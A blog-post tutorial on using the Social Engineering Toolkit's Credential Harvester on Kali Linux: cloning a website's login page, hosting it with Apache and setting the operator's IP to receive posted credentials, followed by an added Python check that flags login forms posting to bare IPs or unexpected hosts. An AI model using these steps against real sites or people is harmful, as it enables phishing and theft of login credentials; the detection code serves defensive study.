Friday, March 10, 2017

Social Engineering Toolkit: Credential Harvesting


Overview
The Social Engineering Toolkit (SET) is specifically designed to perform advanced attacks against the human element.[1]


Requirements
For this blog post I used the Kali Linux operating system, which comes with SET pre-installed.



Instructions
Launch SET
  • Applications > Exploitation Tools > Social Engineering ToolKit
A. Loading Credential Harvesting
  1. Select: "1) Social-Engineering Attacks" by typing the number 1
  2. Select: "2) Website Attack Vectors" by typing the number 2
  3. Select: "3) Credential Harvester Attack Method" by typing the number 3
  4. Select: "3) Custom Import"  by typing the number 3


B. Cloning A Website
  1. Open a browser (Any browser will work)
  2. Navigate to the Website Login page you wish to clone. 
  3. Navigate to the File option in your browser.
  4. Change the Name field to index.html (the name is case sensitive)
  5. Change the Save Location to /var/www/html
  6. Change Type to Web Page, Complete
  7. Save
C. Arming the Website
  1. Open a Terminal and type ifconfig
  2. Copy the inet addr: xxx.xxx.xxx.xxx
  3. Paste the inet addr into the terminal running SET
    • set: webattack > IP address for the POST back in Harvester/Tabnabbing: xxx.xxx.xxx.xxx
  4. Type the following file path:
    • /var/www/html
  5. Type the URL of the website you cloned.
  6. Type "y" to confirm that you want to start the Apache server.
D. Testing the Website
If everything was done correctly, you'll see an exact copy of the website you cloned.
  1. Open a browser (on the same machine you used SET on)
  2. Type your inet addr (xxx.xxx.xxx.xxx) into the URL bar.
  3. Press the Enter key
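
A defensive check for the pattern this walkthrough sets up: a copied login page whose credentials are posted back to the operator's IP address. This is an added example, not part of the original post or of SET; the function names, hostnames and sample HTML are constructed, and it assumes the copied form's action has been pointed at the POST-back address.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collect the action of every <form> that contains a password input."""

    def __init__(self):
        super().__init__()
        self._action = None          # action of the form currently open
        self.actions = []            # actions of forms that ask for a password

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._action = a.get("action") or ""
        elif tag == "input" and self._action is not None:
            if (a.get("type") or "").lower() == "password":
                self.actions.append(self._action)
                self._action = None  # record each form only once

    def handle_endtag(self, tag):
        if tag == "form":
            self._action = None


def suspicious_login_forms(html, expected_hosts):
    """Return (action, reason) for password forms posting somewhere unexpected."""
    scanner = _FormScanner()
    scanner.feed(html)
    findings = []
    for action in scanner.actions:
        host = urlparse(action).hostname
        if host is None:
            continue  # relative action: goes to whichever host served the page
        try:
            ipaddress.ip_address(host)
            findings.append((action, "posts to a bare IP address"))
        except ValueError:
            if host not in expected_hosts:
                findings.append((action, "posts to an unexpected host"))
    return findings


# Constructed samples (192.0.2.0/24 is a documentation-only range).
COPIED = ('<form method="post" action="http://192.0.2.10/">'
          '<input name="user"><input type="password" name="pass"></form>')
GENUINE = ('<form method="post" action="https://login.example.com/session">'
           '<input name="user"><input type="password" name="pass"></form>')
```

A relative form action is not flagged, so pair this with a check on the host that actually served the page.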

Reference
1. Social Engineering Toolkit

Social Media
Facebook:
https://www.facebook.com/BDavisCS/

Twitter:
@BDavis_CyberSec
